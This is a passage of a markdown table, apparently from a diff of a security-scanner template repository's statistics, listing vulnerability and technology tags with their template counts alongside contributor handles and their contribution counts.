| +| misc | 40 | its0x08 | 7 | | | | | | | +| miscellaneous | 38 | divya_mudgal | 7 | | | | | | | +| injection | 38 | puzzlepeaches | 6 | | | | | | | +| jira | 37 | __fazal | 6 | | | | | | | +| kubernetes | 37 | devang-solanki | 6 | | | | | | | +| listing | 37 | clem9669 | 6 | | | | | | | +| cti | 36 | forgedhallpass | 6 | | | | | | | +| ibm | 36 | praetorian-thendrickson | 6 | | | | | | | +| osint-misc | 35 | pathtaga | 6 | | | | | | | +| sap | 34 | justaacat | 6 | | | | | | | +| fuzz | 34 | hahwul | 6 | | | | | | | +| ssl | 33 | evan rubinstein | 6 | | | | | | | +| tls | 32 | megamansec | 6 | | | | | | | +| osint-tech | 31 | pentest_swissky | 6 | | | | | | | +| ec2 | 30 | lucky0x0d | 6 | | | | | | | +| osint-coding | 30 | gitlab red team | 6 | | | | | | | +| dlink | 30 | byt3bl33d3r | 6 | | | | | | | +| wp-theme | 30 | xelkomy | 6 | | | | | | | +| api | 28 | ja1sh | 6 | | | | | | | +| k8s | 28 | imnightmaree | 6 | | | | | | | +| gitlab | 28 | kh4sh3i | 5 | | | | | | | +| fortinet | 28 | gtrrnr | 5 | | | | | | | +| proxy | 27 | shine | 5 | | | | | | | +| citrix | 27 | podalirius | 5 | | | | | | | +| dns | 27 | defr0ggy | 5 | | | | | | | +| bestwebsoft | 27 | r12w4n | 5 | | | | | | | +| firewall | 26 | ganofins | 5 | | | | | | | +| cve2012 | 26 | robotshell | 5 | | | | | | | +| lfr | 26 | joanbono | 5 | | | | | | | +| ssh | 26 | arm!tage | 5 | | | | | | | +| zohocorp | 26 | andreluna | 5 | | | | | | | +| weaver | 25 | powerexploit | 5 | | | | | | | +| manageengine | 25 | panch0r3d | 5 | | | | | | | +| osint-shopping | 24 | your3cho | 5 | | | | | | | +| zoho | 24 | s0obi | 5 | | | | | | | +| osint-finance | 24 | pulsesecurity.co.nz | 5 | | | | | | | +| admin | 24 | prajiteshsingh | 5 | | | | | | | +| osint-business | 24 | mr-xn | 5 | | | | | | | +| osint-images | 24 | yanyun | 5 | | | | | | | +| audit | 23 | r3naissance | 5 | | | | | | | +| xxe | 23 | vicrack | 5 | | | | | | | +| yonyou | 23 | cookiehanhoan | 4 | | | | | | | +| stored-xss | 23 | dolev farhi | 4 | | | | | | | +| file-upload | 23 | ggranjus | 4 | | | | | | | +| tomcat | 23 | ice3man543 | 4 | | | | | | | +| s3 | 22 | m4lwhere | 4 | | | | | | | +| github | 22 | king-alexander | 4 | | | | | | | +| prestashop | 22 | lum8rjack | 4 | | | | | | | +| cicd | 22 | shankar acharya | 4 | | | | | | | +| msf | 21 | h1ei1 | 4 | | | | | | | +| ecology | 21 | dadevel | 4 | | | | | | | +| printer | 21 | xxcdd | 4 | | | | | | | +| weblogic | 21 | 0xr2r | 4 | | | | | | | +| dast | 21 | nybble04 | 4 | | | | | | | +| jenkins | 20 | k0pak4 | 4 | | | | | | | +| camera | 20 | scent2d | 4 | | | | | | | +| ftp | 20 | flx | 4 | | | | | | | +| wavlink | 19 | wisnupramoedya | 4 | | | | | | | +| confluence | 19 | 3th1c_yuk1 | 4 | | | | | | | +| grafana | 19 | tanq16 | 4 | | | | | | | +| hp | 19 | heeress | 4 | | | | | | | +| rukovoditel | 19 | jpg0mez | 4 | | | | | | | +| struts | 19 | iamnooob | 4 | | | | | | | +| android | 18 | e_schultze_ | 4 | | | | | | | +| osint-music | 18 | incogbyte | 4 | | | | | | | +| vpn | 18 | shifacyclewala | 3 | | | | | | | +| coldfusion | 18 | xianke | 3 | | | | | | | +| ruijie | 18 | lucasljm2001 | 3 | | | | | | | +| node.js | 18 | jarijaas | 3 | | | | | | | +| cve2011 | 18 | ekrause | 3 | | | | | | | +| headless | 17 | vagnerd | 3 | | | | | | | +| honeypot | 17 | andydoering | 3 | | | | | | | +| nginx | 17 | dr0pd34d | 3 | | | | | | | +| microweber | 17 | true13 | 3 | | | | | | | +| azure | 17 | evergreencartoons | 3 | | | | | | | +| mail | 17 | fxploit | 3 | | | | | | | +| backup | 16 | vsh00t | 3 | | | | | | | +| rconfig | 16 | whoever | 3 | | | | | | | +| jarm | 16 | farish | 3 | | | | | | | +| service | 16 | _generic_human_ | 3 | | | | | | | +| magento | 16 | imjust0 | 3 | | | | | | | +| osint-blog | 16 | splint3r7 | 3 | | | | | | | +| backdoor | 16 | z3bd | 3 | | | | | | | +| status | 16 | dudez | 3 | | | | | | | +| alibaba | 16 | ph33r | 3 | | | | | | | +| cve2009 | 16 | matt galligan | 3 | | | | | | | +| setup | 15 | thomas_from_offensity | 3 | | | | | | | +| tongda | 15 | me9187 | 3 | | | | | | | +| netgear | 15 | parth | 3 | | | | | | | +| ruby | 15 | emenalf | 3 | | | | | | | +| cnvd2021 | 15 | johnjhacking | 3 | | | | | | | +| nagios | 15 | fyoorer | 3 | | | | | | | +| java | 15 | coldfish | 3 | | | | | | | +| ssti | 15 | salts | 3 | | | | | | | +| dashboard | 15 | omranisecurity | 3 | | | | | | | +| installer | 15 | alifathi-h1 | 3 | | | | | | | +| bypass | 15 | j3ssie | 3 | | | | | | | +| woocommerce | 15 | unstabl3 | 3 | | | | | | | +| cve2013 | 15 | mavericknerd | 3 | | | | | | | +| nodejs | 15 | yuzhe-zhang-0 | 3 | | | | | | | +| seeyon | 15 | e1a | 3 | | | | | | | +| redhat | 15 | f1tz | 3 | | | | | | | +| zyxel | 15 | atomiczsec | 3 | | | | | | | +| moosocial | 15 | isacaya | 3 | | | | | | | +| cve2008 | 15 | badboycxcc | 3 | | | | | | | +| node | 14 | davidmckennirey | 3 | | | | | | | +| login-check | 14 | skeltavik | 3 | | | | | | | +| domainmod | 14 | 0w4ys | 3 | | | | | | | +| git | 14 | taielab | 3 | | | | | | | +| creds-stuffing | 14 | bernardofsr | 3 | | | | | | | +| osint-art | 14 | randomrobbie | 3 | | | | | | | +| redis | 14 | arcc | 3 | | | | | | | +| npm | 14 | canberbamber | 3 | | | | | | | +| docker | 14 | impramodsargar | 3 | | | | | | | +| osint-health | 14 | aringo | 3 | | | | | | | +| icewarp | 14 | ambassify | 3 | | | | | | | +| info-leak | 14 | lark-lab | 3 | | | | | | | +| auth | 14 | swissky | 3 | | | | | | | +| ivanti | 14 | yash anand @yashanand155 | 3 | | | | | | | +| smtp | 14 | huowuzhao | 3 | | | | | | | +| rds | 14 | c4sper0 | 3 | | | | | | | +| dell | 14 | sushantkamble | 3 | | | | | | | +| jboss | 14 | cheesymoon | 3 | | | | | | | +| windows | 13 | binaryfigments | 3 | | | | | | | +| osint-dating | 13 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| mysql | 13 | vavkamil | 2 | | | | | | | +| rails | 13 | nvn1729 | 2 | | | | | | | +| cuppa | 13 | x1m_martijn | 2 | | | | | | | +| fortigate | 13 | topscoder | 2 | | | | | | | +| sonicwall | 13 | davidegirardi | 2 | | | | | | | +| fuzzing | 13 | lotusdll | 2 | | | | | | | +| cuppacms | 13 | supr4s | 2 | | | | | | | +| postgresql | 13 | mohammedsaneem | 2 | | | | | | | +| airflow | 13 | geekby | 2 | | | | | | | +| laravel | 13 | joeldeleep | 2 | | | | | | | +| osint-political | 13 | kre80r | 2 | | | | | | | +| abstractapi | 13 | mrharshvardhan | 2 | | | | | | | +| graphql | 13 | ehsahil | 2 | | | | | | | +| hashicorp | 13 | gevakun | 2 | | | | | | | +| netsweeper | 12 | sascha brendel | 2 | | | | | | | +| newrelic | 12 | moritz nentwig | 2 | | | | | | | +| jetbrains | 12 | bsysop | 2 | | | | | | | +| kafka | 12 | raesene | 2 | | | | | | | +| doppler | 12 | n-thumann | 2 | | | | | | | +| vbulletin | 12 | christianpoeschl | 2 | | | | | | | +| zimbra | 12 | joshlarsen | 2 | | | | | | | +| smb | 12 | z0ne | 2 | | | | | | | +| drupal | 12 | supras | 2 | | | | | | | +| phpgurukul | 12 | g4l1t0 | 2 | | | | | | | +| ofbiz | 12 | joshua rogers | 2 | | | | | | | +| webserver | 12 | ep1csage | 2 | | | | | | | +| xstream | 11 | gal nagli | 2 | | | | | | | +| django | 11 | socketz | 2 | | | | | | | +| dedecms | 11 | koti2 | 2 | | | | | | | +| osint-video | 11 | arliya | 2 | | | | | | | +| prometheus | 11 | h0j3n | 2 | | | | | | | +| online_fire_reporting_system_project | 11 | brenocss | 2 | | | | | | | +| glpi | 11 | martincodes-de | 2 | | | | | | | +| spring | 11 | dahse89 | 2 | | | | | | | +| hikvision | 11 | github.com/its0x08 | 2 | | | | | | | +| cache | 11 | nkxxkn | 2 | | | | | | | +| jolokia | 11 | thevillagehacker | 2 | | | | | | | +| iam | 11 | usdag | 2 | | | | | | | +| phpmyadmin | 11 | v0idc0de | 2 | | | | | | | +| fastjson | 11 | 0xelkomy | 2 | | | | | | | +| iis | 11 | danmcinerney | 2 | | | | | | | +| online-fire-reporting | 11 | lstatro | 2 | | | | | | | +| zabbix | 10 | sy3omda | 2 | | | | | | | +| symfony | 10 | charles d. | 2 | | | | | | | +| sitecore | 10 | udit_thakkur | 2 | | | | | | | +| xstream_project | 10 | uomogrande | 2 | | | | | | | +| db | 10 | sbani | 2 | | | | | | | +| dahua | 10 | nuk3s3c | 2 | | | | | | | +| digitalocean | 10 | afaq | 2 | | | | | | | +| elasticsearch | 10 | shankaracharya | 2 | | | | | | | +| thinkphp | 10 | thezakman | 2 | | | | | | | +| solarview | 10 | 6mile | 2 | | | | | | | +| samsung | 10 | thabisocn | 2 | | | | | | | +| crlf | 10 | bmcel | 2 | | | | | | | +| solr | 10 | ree4pwn | 2 | | | | | | | +| progress | 10 | ayadim | 2 | | | | | | | +| dropbox | 10 | paperpen | 2 | | | | | | | +| secret | 9 | dogancanbakir | 2 | | | | | | | +| cloudtrail | 9 | charles d | 2 | | | | | | | +| facebook | 9 | kishore-hariram | 2 | | | | | | | +| sangfor | 9 | y4er | 2 | | | | | | | +| vcenter | 9 | dheerajmadhukar | 2 | | | | | | | +| elastic | 9 | clarkvoss | 2 | | | | | | | +| pfsense | 9 | k11h-de | 2 | | | | | | | +| artica | 9 | zomsop82 | 2 | | | | | | | +| firebase | 9 | serrapa | 2 | | | | | | | +| moodle | 9 | d4vy | 2 | | | | | | | +| druid | 9 | cocxanh | 2 | | | | | | | +| python | 9 | shelled | 2 | | | | | | | +| versa | 9 | ajaysenr | 2 | | | | | | | +| joomla\! | 9 | amirhossein raeisi | 2 | | | | | | | +| kube | 9 | 0xsmiley | 2 | | | | | | | +| gateway | 9 | w4cky_ | 2 | | | | | | | +| exchange | 9 | liwermor | 2 | | | | | | | +| blind | 9 | 8arthur | 2 | | | | | | | +| f5 | 9 | foulenzer | 2 | | | | | | | +| console | 9 | myztique | 2 | | | | | | | +| cnvd2020 | 9 | florianmaak | 2 | | | | | | | +| wso2 | 9 | t3l3machus | 2 | | | | | | | +| bitbucket | 9 | thardt-praetorian | 2 | | | | | | | +| gitea | 9 | randomdhiraj | 2 | | | | | | | +| opencats | 9 | sinkettu | 2 | | | | | | | +| scada | 9 | herry | 2 | | | | | | | +| lucee | 9 | codexlynx | 2 | | | | | | | +| sophos | 9 | streetofhackerr007 | 2 | | | | | | | +| manager | 8 | egemenkochisarli | 2 | | | | | | | +| huawei | 8 | mzack9999 | 2 | | | | | | | +| hms | 8 | manas_harsh | 2 | | | | | | | +| nexus | 8 | hetroublemakr | 2 | | | | | | | +| odoo | 8 | pxmme1337 | 2 | | | | | | | +| mlflow | 8 | notnotnotveg | 2 | | | | | | | +| metadata | 8 | michal mikolas (nanuqcz) | 2 | | | | | | | +| symantec | 8 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| lfprojects | 8 | securityforeveryone | 2 | | | | | | | +| phpinfo | 8 | bp0lr | 2 | | | | | | | +| unauthenticated | 8 | kiblyn11 | 2 | | | | | | | +| emerge | 8 | hackerarpan | 2 | | | | | | | +| ognl | 8 | 0xsapra | 2 | | | | | | | +| nagiosxi | 8 | amsda | 2 | | | | | | | +| openemr | 8 | danielmofer | 2 | | | | | | | +| oauth | 8 | israel comazzetto dos reis | 2 | | | | | | | +| phpjabbers | 8 | dbrwsky | 2 | | | | | | | +| cisco-switch | 8 | 0xcrypto | 2 | | | | | | | +| bucket | 8 | zy9ard3 | 2 | | | | | | | +| e-office | 8 | maximus decimus | 2 | | | | | | | +| osint-news | 8 | msegoviag | 2 | | | | | | | +| wanhu | 8 | wa1tf0rme | 2 | | | | | | | +| instrusive | 8 | paradessia | 2 | | | | | | | +| error | 8 | luci | 2 | | | | | | | +| go | 8 | 666asd | 2 | | | | | | | +| spotweb | 8 | redteambrasil | 2 | | | | | | | +| discord | 8 | rafaelwdornelas | 2 | | | | | | | +| spotweb_project | 8 | 0xnirvana | 2 | | | | | | | +| exploitdb | 8 | korteke | 2 | | | | | | | +| microfocus | 8 | pbuff07 | 2 | | | | | | | +| cloud-enum | 8 | bing0o | 2 | | | | | | | +| recon | 8 | c3l3si4n | 2 | | | | | | | +| default-page | 8 | cckuakilong | 2 | | | | | | | +| mirai | 8 | brucelsone | 2 | | | | | | | +| config-audit | 8 | convisoappsec | 2 | | | | | | | +| atom | 8 | ricardo maia (brainfork) | 2 | | | | | | | +| activemq | 7 | parzival | 2 | | | | | | | +| rfi | 7 | bananabr | 2 | | | | | | | +| filemanager | 7 | 0xrudra | 2 | | | | | | | +| solarwinds | 7 | colbyjack1134 | 1 | | | | | | | +| gogs | 7 | pry0cc | 1 | | | | | | | +| car_rental_management_system_project | 7 | jc175 | 1 | | | | | | | +| avtech | 7 | barthy.koeln | 1 | | | | | | | +| oos | 7 | phyr3wall | 1 | | | | | | | +| monstra | 7 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| fortios | 7 | michal-mikolas | 1 | | | | | | | +| linkedin | 7 | borna nematzadeh | 1 | | | | | | | +| landray | 7 | francescocarlucci | 1 | | | | | | | +| bigip | 7 | 0xprial | 1 | | | | | | | +| teamcity | 7 | andirrahmani1 | 1 | | | | | | | +| mongodb | 7 | ritesh_gohil(#l4stpl4y3r) | 1 | | | | | | | +| nortekcontrol | 7 | x6263 | 1 | | | | | | | +| database | 7 | kiransau | 1 | | | | | | | +| vms | 7 | houdinis | 1 | | | | | | | +| shopify | 7 | sshell | 1 | | | | | | | +| vpc | 7 | mordavid | 1 | | | | | | | +| telesquare | 7 | jas37 | 1 | | | | | | | +| nacos | 7 | b0rn2r00t | 1 | | | | | | | +| slack | 7 | sdcampbell | 1 | | | | | | | +| fpd | 7 | aayush vishnoi | 1 | | | | | | | +| mobileiron | 7 | olewagner | 1 | | | | | | | +| keking | 7 | hexcat | 1 | | | | | | | +| contec | 7 | danigoland | 1 | | | | | | | +| vrealize | 7 | w8ay | 1 | | | | | | | +| opensis | 7 | lrtk-coder | 1 | | | | | | | +| websphere | 7 | jeya seelan | 1 | | | | | | | +| twitter | 7 | andysvints | 1 | | | | | | | +| squirrelmail | 7 | luqmaan hadia | 1 | | | | | | | +| blockchain | 7 | toufik-airane | 1 | | | | | | | +| cacti | 7 | erethon | 1 | | | | | | | +| bloofox | 7 | h4kux | 1 | | | | | | | +| moodating | 7 | 8authur | 1 | | | | | | | +| ruckus | 7 | orpheus | 1 | | | | | | | +| pmb | 7 | xcapri | 1 | | | | | | | +| maps | 7 | anonymous | 1 | | | | | | | +| webmin | 6 | caon | 1 | | | | | | | +| plesk | 6 | tangxiaofeng7 | 1 | | | | | | | +| kubelet | 6 | kurohost | 1 | | | | | | | +| microstrategy | 6 | arqsz | 1 | | | | | | | +| beyondtrust | 6 | rojanrijal | 1 | | | | | | | +| sonarqube | 6 | jub0bs | 1 | | | | | | | +| doctor-appointment-system | 6 | lark lab | 1 | | | | | | | +| express | 6 | wabafet | 1 | | | | | | | +| synacor | 6 | noah @thesubtlety | 1 | | | | | | | +| magmi | 6 | ledoubletake | 1 | | | | | | | +| couchdb | 6 | noobexploiter | 1 | | | | | | | +| splunk | 6 | numan türle | 1 | | | | | | | +| minio | 6 | rinolock | 1 | | | | | | | +| keycloak | 6 | xeldax | 1 | | | | | | | +| cockpit | 6 | dabla | 1 | | | | | | | +| elfinder | 6 | danfaizer | 1 | | | | | | | +| sql | 6 | marcos_iaf | 1 | | | | | | | +| paypal | 6 | kishore krishna (sillydaddy) | 1 | | | | | | | +| liferay | 6 | 0xh7ml | 1 | | | | | | | +| bmc | 6 | zhenwarx | 1 | | | | | | | +| typo3 | 6 | vulnspace | 1 | | | | | | | +| advantech | 6 | yashgoti | 1 | | | | | | | +| chanjet | 6 | alex | 1 | | | | | | | +| gcp | 6 | ofjaaah | 1 | | | | | | | +| tikiwiki | 6 | harryha | 1 | | | | | | | +| jeecg | 6 | diablo | 1 | | | | | | | +| jamf | 6 | ptonewreckin | 1 | | | | | | | +| server | 6 | aaban solutions | 1 | | | | | | | +| log | 6 | denandz | 1 | | | | | | | +| jetty | 6 | lamscun | 1 | | | | | | | +| cobbler | 6 | undefl0w | 1 | | | | | | | +| flutterwave | 6 | jacalynli | 1 | | | | | | | +| ldap | 6 | y0no | 1 | | | | | | | +| openvpn | 6 | unblvr1 | 1 | | | | | | | +| geoserver | 6 | sinsinology | 1 | | | | | | | +| doctor_appointment_system_project | 6 | k3rwin | 1 | | | | | | | +| servicenow | 6 | domenicoveneziano | 1 | | | | | | | +| paloaltonetworks | 6 | shreyapohekar | 1 | | | | | | | +| 74cms | 6 | qianbenhyu | 1 | | | | | | | +| asp | 6 | none | 1 | | | | | | | +| rat | 6 | nuts7 | 1 | | | | | | | +| zhiyuan | 6 | piyushchhiroliya | 1 | | | | | | | +| leak | 6 | pepitoh | 1 | | | | | | | +| asus | 6 | yuansec | 1 | | | | | | | +| xmlrpc | 5 | viondexd | 1 | | | | | | | +| swagger | 5 | vzamanillo | 1 | | | | | | | +| circarlife | 5 | jbaines-r7 | 1 | | | | | | | +| qnap | 5 | momen eldawakhly | 1 | | | | | | | +| web3 | 5 | bywalks | 1 | | | | | | | +| awstats | 5 | evan rubinstien | 1 | | | | | | | +| kkfileview | 5 | adilsoybali | 1 | | | | | | | +| tibco | 5 | push4d | 1 | | | | | | | +| carrental | 5 | tirtha | 1 | | | | | | | +| papercut | 5 | savik | 1 | | | | | | | +| 10web | 5 | babybash | 1 | | | | | | | +| craftcms | 5 | retr0 | 1 | | | | | | | +| genetechsolutions | 5 | ramkrishna sawant | 1 | | | | | | | +| goanywhere | 5 | thirukrishnan | 1 | | | | | | | +| webkul | 5 | invisiblethreat | 1 | | | | | | | +| zzzcms | 5 | exploitation | 1 | | | | | | | +| hpe | 5 | knassar702 | 1 | | | | | | | +| akamai | 5 | 0xteles | 1 | | | | | | | +| chamilo | 5 | sec_hawk | 1 | | | | | | | +| metinfo | 5 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| hybris | 5 | carlosvieira | 1 | | | | | | | +| openai | 5 | dhiyanesdk | 1 | | | | | | | +| storage | 5 | af001 | 1 | | | | | | | +| terramaster | 5 | wlayzz | 1 | | | | | | | +| ems | 5 | dk999 | 1 | | | | | | | +| redmine | 5 | blckraven | 1 | | | | | | | +| dionaea | 5 | amnotacat | 1 | | | | | | | +| openfire | 5 | shifacyclewla | 1 | | | | | | | +| nuuo | 5 | official_blackhat13 | 1 | | | | | | | +| schneider-electric | 5 | rschio | 1 | | | | | | | +| telerik | 5 | mukundbhuva | 1 | | | | | | | +| adminer | 5 | realexp3rt | 1 | | | | | | | +| cloudflare | 5 | mayankpandey01 | 1 | | | | | | | +| cve2007 | 5 | ling | 1 | | | | | | | +| graylog | 5 | compr00t | 1 | | | | | | | +| connectwise | 5 | ringo | 1 | | | | | | | +| pyload | 5 | adrianmf | 1 | | | | | | | +| adb | 5 | furkansayim | 1 | | | | | | | +| hoteldruid | 5 | watchtowr | 1 | | | | | | | +| decision-center | 5 | guax1 | 1 | | | | | | | +| sentry | 5 | hczdmr | 1 | | | | | | | +| jupyter | 5 | th3.d1p4k | 1 | | | | | | | +| gnu | 5 | hakluke | 1 | | | | | | | +| react | 5 | thebinitghimire | 1 | | | | | | | +| avaya | 5 | phillipo | 1 | | | | | | | +| openstack | 5 | paper-pen | 1 | | | | | | | +| caucho | 5 | 0xrod | 1 | | | | | | | +| circontrol | 5 | pratik khalane | 1 | | | | | | | +| checkpoint | 5 | husain | 1 | | | | | | | +| froxlor | 5 | schniggie | 1 | | | | | | | +| digitaldruid | 5 | absshax | 1 | | | | | | | +| magmi_project | 5 | brianlam38 | 1 | | | | | | | +| strapi | 5 | willd96 | 1 | | | | | | | +| crushftp | 5 | remonsec | 1 | | | | | | | +| cdata | 5 | kresec | 1 | | | | | | | +| vehicle_service_management_system_project | 5 | nobody | 1 | | | | | | | +| voip | 5 | petruknisme | 1 | | | | | | | +| elementor | 5 | secthebit | 1 | | | | | | | +| fatpipe | 5 | imhunterand | 1 | | | | | | | +| wpdevart | 5 | bughuntersurya | 1 | | | | | | | +| mikrotik | 5 | dwbzn | 1 | | | | | | | +| jabber | 5 | juicypotato1 | 1 | | | | | | | +| qdpm | 5 | pussycat0 | 1 | | | | | | | +| acm | 5 | jfbes | 1 | | | | | | | +| agentejo | 5 | r3s ost | 1 | | | | | | | +| firmware | 5 | metascan | 1 | | | | | | | +| square | 5 | hyunsoo-ds | 1 | | | | | | | +| percha | 5 | ooooooo_q | 1 | | | | | | | +| wbce | 5 | mabdullah22 | 1 | | | | | | | +| rseenet | 5 | affix | 1 | | | | | | | +| cnvd2023 | 5 | exceed | 1 | | | | | | | +| tenda | 5 | nielsing | 1 | | | | | | | +| totolink | 5 | intx0x80 | 1 | | | | | | | +| open-emr | 5 | arr0way | 1 | | | | | | | +| ethereum | 5 | juliosmelo | 1 | | | | | | | +| webview | 5 | fq_hsu | 1 | | | | | | | +| asana | 5 | vinit989 | 1 | | | | | | | +| sftp | 5 | ayadi | 1 | | | | | | | +| glpi-project | 5 | smaranchand | 1 | | | | | | | +| resin | 5 | shivampand3y | 1 | | | | | | | +| jwt | 5 | ruppde | 1 | | | | | | | +| gocd | 5 | rivalsec | 1 | | | | | | | +| sysaid | 5 | 0xd0ff9 | 1 | | | | | | | +| apisix | 5 | hazana | 1 | | | | | | | +| mssql | 5 | tim_koopmans | 1 | | | | | | | +| parallels | 5 | floriandewald | 1 | | | | | | | +| avideo | 5 | unknown | 1 | | | | | | | +| thedigitalcraft | 5 | h4sh5 | 1 | | | | | | | +| axigen | 5 | wpsec | 1 | | | | | | | +| spark | 5 | shelld3v | 1 | | | | | | | +| matrix | 5 | amir-h-fallahi | 1 | | | | | | | +| moveit | 4 | sicksec | 1 | | | | | | | +| dom | 4 | unkl4b | 1 | | | | | | | +| pluginus | 4 | geraldino2 | 1 | | | | | | | +| phppgadmin | 4 | kba@sogeti_esec | 1 | | | | | | | +| proftpd | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| kyocera | 4 | failopen | 1 | | | | | | | +| zte | 4 | notwhy | 1 | | | | | | | +| bitrix | 4 | josecosta | 1 | | | | | | | +| heroku | 4 | bjhulst | 1 | | | | | | | +| learnpress | 4 | sak1 | 1 | | | | | | | +| env | 4 | _harleo | 1 | | | | | | | +| confluent | 4 | chetgan | 1 | | | | | | | +| newstatpress | 4 | yaser_s | 1 | | | | | | | +| mailchimp | 4 | irshadahamed | 1 | | | | | | | +| ebs | 4 | allenwest24 | 1 | | | | | | | +| osgeo | 4 | rotemreiss | 1 | | | | | | | +| creativeitem | 4 | petergrifin | 1 | | | | | | | +| hospital_management_system_project | 4 | jteles | 1 | | | | | | | +| pie-register | 4 | ahmetpergamum | 1 | | | | | | | +| concrete | 4 | clment cruchet | 1 | | | | | | | +| mooveagency | 4 | xstp | 1 | | | | | | | +| aria | 4 | justmumu | 1 | | | | | | | +| pmb_project | 4 | manasmbellani | 1 | | | | | | | +| newstatpress_project | 4 | jrolf | 1 | | | | | | | +| pega | 4 | lbb | 1 | | | | | | | +| royalevent | 4 | mlec | 1 | | | | | | | +| stripe | 4 | lingtren | 1 | | | | | | | +| pentaho | 4 | akokonunes | 1 | | | | | | | +| veronalabs | 4 | ola456 | 1 | | | | | | | +| aura | 4 | breno_css | 1 | | | | | | | +| httpserver | 4 | chesterblue | 1 | | | | | | | +| pip | 4 | kiks7 | 1 | | | | | | | +| h3c | 4 | am0nt31r0 | 1 | | | | | | | +| http | 4 | izn0u | 1 | | | | | | | +| joomlamo | 4 | kailashbohara | 1 | | | | | | | +| rabbitmq | 4 | myst7ic | 1 | | | | | | | +| flickr | 4 | couskito | 1 | | | | | | | +| roxy | 4 | ky9oss | 1 | | | | | | | +| powerjob | 4 | pdp | 1 | | | | | | | +| flink | 4 | hotpot | 1 | | | | | | | +| cnvd2022 | 4 | mchklt | 1 | | | | | | | +| reprisesoftware | 4 | sanineng | 1 | | | | | | | +| finicity | 4 | luqman | 1 | | | | | | | +| sigb | 4 | fur1na | 1 | | | | | | | +| mostracms | 4 | napgh0st | 1 | | | | | | | +| thimpress | 4 | aringo-bf | 1 | | | | | | | +| wcs | 4 | aaronchen0 | 1 | | | | | | | +| postmessage | 4 | opencirt | 1 | | | | | | | +| hongdian | 4 | prettyboyaaditya | 1 | | | | | | | +| churchcrm | 4 | co0nan | 1 | | | | | | | +| datadog | 4 | dali | 1 | | | | | | | +| ray | 4 | naglis | 1 | | | | | | | +| sugarcrm | 4 | screamy | 1 | | | | | | | +| jsf | 4 | ramondunker | 1 | | | | | | | +| rubyonrails | 4 | osamahamad | 1 | | | | | | | +| seagate | 4 | elouhi | 1 | | | | | | | +| panos | 4 | higor melgaço (eremit4) | 1 | | | | | | | +| phpjabber | 4 | liquidsec | 1 | | | | | | | +| ternaria | 4 | droberson | 1 | | | | | | | +| dahuasecurity | 4 | ldionmarcil | 1 | | | | | | | +| artifactory | 4 | thelicato | 1 | | | | | | | +| search | 4 | sickwell | 1 | | | | | | | +| owncloud | 4 | mesaglio | 1 | | | | | | | +| djangoproject | 4 | xc1ym | 1 | | | | | | | +| metabase | 4 | lixts | 1 | | | | | | | +| shiro | 4 | mammad_rahimzada | 1 | | | | | | | +| puppet | 4 | ilovebinbash | 1 | | | | | | | +| eclipse | 4 | ahmed sherif | 1 | | | | | | | +| os4ed | 4 | win3zz | 1 | | | | | | | +| bittrex | 4 | samuelsamuelsamuel | 1 | | | | | | | +| arcgis | 4 | amanrawat | 1 | | | | | | | +| mostra | 4 | f0xy | 1 | | | | | | | +| linksys | 4 | micha3lb3n | 1 | | | | | | | +| intelbras | 4 | fmunozs | 1 | | | | | | | +| photo | 4 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| panabit | 4 | ratnadip gajbhiye | 1 | | | | | | | +| cnvd2019 | 4 | daviey | 1 | | | | | | | +| sound4 | 4 | nagli | 1 | | | | | | | +| auieo | 4 | jbertman | 1 | | | | | | | +| pixie | 4 | f1she3 | 1 | | | | | | | +| info | 4 | puben | 1 | | | | | | | +| opencms | 4 | ynnirc | 1 | | | | | | | +| linuxfoundation | 4 | high | 1 | | | | | | | +| kingsoft | 4 | arjunchandarana | 1 | | | | | | | +| juniper | 4 | miryangjung | 1 | | | | | | | +| horde | 4 | notsoevilweasel | 1 | | | | | | | +| nosqli | 4 | technicaljunkie | 1 | | | | | | | +| imgproxy | 4 | mayank_pandey01 | 1 | | | | | | | +| yeswiki | 4 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| harbor | 4 | 5up3r541y4n | 1 | | | | | | | +| mautic | 4 | daffianfo | 1 | | | | | | | +| jellyfin | 4 | whynotke | 1 | | | | | | | +| metersphere | 4 | regala_ | 1 | | | | | | | +| salesforce | 4 | brabbit10 | 1 | | | | | | | +| purchase_order_management_system_project | 4 | jna1 | 1 | | | | | | | +| globalprotect | 4 | miguelsegoviagil | 1 | | | | | | | +| fit2cloud | 4 | narluin | 1 | | | | | | | +| password | 4 | mantissts | 1 | | | | | | | +| myeventon | 4 | infosecsanyam | 1 | | | | | | | +| osint-archived | 4 | hateshape | 1 | | | | | | | +| terra-master | 4 | dawid-czarnecki | 1 | | | | | | | +| igniterealtime | 4 | un-fmunozs | 1 | | | | | | | +| okta | 4 | omarkurt | 1 | | | | | | | +| jfrog | 4 | elitebaz | 1 | | | | | | | +| thinkcmf | 4 | 0ut0fb4nd | 1 | | | | | | | +| flatpress | 4 | professorabhay | 1 | | | | | | | +| mitel | 4 | jeya.seelan | 1 | | | | | | | +| ghost | 4 | sherlocksecurity | 1 | | | | | | | +| codeigniter | 4 | j33n1k4 | 1 | | | | | | | +| dotnet | 4 | cbadke | 1 | | | | | | | +| mantisbt | 4 | gpiechnik2 | 1 | | | | | | | +| casaos | 4 | dale clarke | 1 | | | | | | | +| ampache | 4 | luciannitescu | 1 | | | | | | | +| kentico | 4 | ndmalc | 1 | | | | | | | +| webshell | 4 | dorkerdevil | 1 | | | | | | | +| linkerd | 4 | aceseven (digisec360) | 1 | | | | | | | +| gnuboard | 4 | pjborah | 1 | | | | | | | +| harmistechnology | 4 | qlkwej | 1 | | | | | | | +| webmail | 4 | erikowen | 1 | | | | | | | +| wireguard | 4 | s1r1us | 1 | | | | | | | +| audiocodes | 4 | revblock | 1 | | | | | | | +| prtg | 4 | b4uh0lz | 1 | | | | | | | +| kevinlab | 4 | fpatrik | 1 | | | | | | | +| centos | 4 | stupidfish | 1 | | | | | | | +| telegram | 4 | 1nf1n7y | 1 | | | | | | | +| jorani | 4 | patralos | 1 | | | | | | | +| umbraco | 4 | banana69 | 1 | | | | | | | +| bamboo | 4 | sorrowx3 | 1 | | | | | | | +| sendgrid | 4 | 2rs3c | 1 | | | | | | | +| tiki | 4 | eremit4 | 1 | | | | | | | +| grav | 4 | abbas.heybati | 1 | | | | | | | +| httpd | 4 | 